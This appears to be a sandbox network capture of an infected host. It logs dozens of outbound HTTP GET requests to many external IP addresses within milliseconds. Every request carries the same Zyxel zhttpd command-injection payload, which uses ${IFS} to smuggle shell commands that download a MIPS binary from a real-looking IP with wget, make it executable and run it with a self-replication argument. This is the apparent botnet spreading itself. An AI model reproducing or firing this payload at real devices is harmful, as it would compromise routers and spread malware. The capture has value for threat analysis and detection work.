                                    Jan 13, 2024 19:02:24.955408096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2137192.168.2.133897852.101.177.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955436945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2138192.168.2.135255267.17.215.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955487013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2139192.168.2.136076025.5.181.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955539942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2140192.168.2.1338762186.46.168.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955558062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2141192.168.2.1336926126.187.185.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955583096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2142192.168.2.133688695.197.54.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955626011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2143192.168.2.1360334112.234.88.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955656052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2144192.168.2.134158434.157.38.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955688953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2145192.168.2.135579645.115.92.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955709934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2146192.168.2.1358672177.222.99.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955745935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2147192.168.2.1343624123.131.155.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955796957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2148192.168.2.13587524.74.110.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955817938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2149192.168.2.134549847.11.113.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955871105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2150192.168.2.134377224.156.192.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955899000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2151192.168.2.133398436.85.45.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955923080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2152192.168.2.1336606100.25.33.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955952883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2153192.168.2.133898672.93.145.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.955969095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2154192.168.2.135536431.142.140.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956020117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2155192.168.2.135223053.184.249.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956077099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2156192.168.2.1350862172.37.173.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956110954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2157192.168.2.133910439.181.241.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956156015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2158192.168.2.1337192217.118.89.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956181049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2159192.168.2.1337408173.163.2.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956193924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2160192.168.2.1340604209.24.187.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956224918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2161192.168.2.1335996191.142.228.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956278086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2162192.168.2.134421292.204.121.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956314087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2163192.168.2.1342968174.48.244.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956342936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2164192.168.2.135426227.115.41.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956365108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2165192.168.2.1355472153.159.12.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956410885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2166192.168.2.13577224.204.78.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956429958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2167192.168.2.135144645.196.89.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956449032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2168192.168.2.135070840.105.78.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956527948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2169192.168.2.1356798186.37.185.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956573009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2170192.168.2.1350672166.212.117.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956590891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2171192.168.2.1360394175.155.124.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956631899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2172192.168.2.1348668198.105.246.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956660986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2173192.168.2.1343754159.242.40.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956712008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2174192.168.2.1335788172.219.170.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956731081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2175192.168.2.1348394139.239.218.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956784010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2176192.168.2.1350254164.19.79.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956809044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2177192.168.2.1336836220.78.135.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956865072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2178192.168.2.135247869.64.32.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956906080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2179192.168.2.133553463.161.15.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956942081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2180192.168.2.135779620.84.180.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.956983089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2181192.168.2.1352844200.27.113.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957036018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2182192.168.2.133497840.33.134.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957083941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2183192.168.2.134951423.150.251.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957118988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2184192.168.2.1333004123.121.105.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957142115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2185192.168.2.1344062182.207.248.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957195997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2186192.168.2.1344336115.182.230.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957227945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2187192.168.2.1355790176.18.111.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957271099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2188192.168.2.1341986137.23.141.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957307100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2189192.168.2.1360984160.218.119.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957360983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2190192.168.2.135123024.251.70.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957391024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2191192.168.2.1337456142.71.116.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957408905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2192192.168.2.133317246.99.234.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957469940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2193192.168.2.1352368178.194.38.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957503080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2194192.168.2.135754279.105.51.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957544088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2195192.168.2.1351836197.87.127.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957587957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2196192.168.2.135610452.70.246.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957621098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2197192.168.2.1340582159.146.128.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957673073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2198192.168.2.135957868.13.135.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:24.957704067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2199192.168.2.134663886.52.12.93443
                                    TimestampBytes transferredDirectionData
